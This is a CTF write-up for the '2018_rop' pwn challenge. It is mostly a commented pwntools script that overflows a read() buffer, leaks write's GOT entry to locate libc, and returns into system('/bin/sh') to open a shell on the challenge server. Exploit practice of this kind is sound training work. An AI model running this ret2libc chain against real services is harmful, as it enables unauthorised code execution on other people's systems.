铁人三项(第五赛区)_2018_rop
Ubuntu18
Checksec:
Ida:
可以很容易找到read函数存在栈溢出,offset=0x88+4
程序中没有system函数和/bin/sh字符串,用ret2libc来绕过NX
Exp:
# Write-up exploit script for the "2018_rop" CTF challenge (32-bit ELF, NX enabled).
# Flow: (1) overflow the stack buffer read by read() and return into write@plt to leak
# write's GOT entry; (2) resolve the remote libc from that leak and compute the
# addresses of system() and the "/bin/sh" string; (3) overflow a second time and
# return into system("/bin/sh").
#
# Defensive reading: the chain works only because the binary ships with NX as its
# sole mitigation. It presumably has no stack canary (the overflow is never handled)
# and no PIE (ELF symbol/PLT addresses are used as absolute values) - TODO confirm
# against the checksec output above. Either a stack protector or PIE would break
# the assumptions this script relies on; a 4-byte write of a GOT entry to stdout is
# also a recognisable artefact in the challenge's I/O.
from pwn import *
from LibcSearcher import*
# Remote challenge instance; the address and port are the ones the write-up used.
r=remote("node4.buuoj.cn",29553)
elf=ELF("./2018_rop")
# main is used as the return address after the leak so the same overflow can be
# triggered a second time with the resolved addresses.
vul_addr=elf.sym['main']
write_plt=elf.plt['write']
write_got=elf.got['write']
read_got=elf.got['read']   # resolved but not used below
# Stage 1: 0x88 bytes of buffer padding + 4 bytes (presumably the saved EBP),
# then the return address write@plt, the return-after-write address (main), and
# the three arguments write(1, &write@got, 4) - i.e. leak write's libc address.
payload = flat('a'*(0x88+0x4)) + p32(write_plt) + p32(vul_addr) + p32(1) + p32(write_got) + p32(4)
r.sendline(payload)
# u32() needs exactly 4 bytes; recv() with no length returns whatever is buffered,
# so this assumes the 4 leaked bytes arrive alone - NOTE(review): fragile, confirm.
write_addr=u32(r.recv())
# LibcSearcher matches the leaked offset against its libc database; the result
# depends on which candidate libc it selects.
libc = LibcSearcher('write', write_addr)
libc_base=write_addr-libc.dump('write')
sys_addr=libc_base+libc.dump('system')
bin_addr=libc_base+libc.dump("str_bin_sh")
# Stage 2: same padding layout (0x88 + 4), then system's address, a dummy return
# address (1) and the pointer to "/bin/sh" as system's single argument.
payload1 = flat("a" * 0x88) + flat("b"*4)+ p32(sys_addr)+p32(1)+p32(bin_addr)
r.sendline(payload1)
# Hand the connection over to the user once the shell is spawned.
r.interactive()
Flag: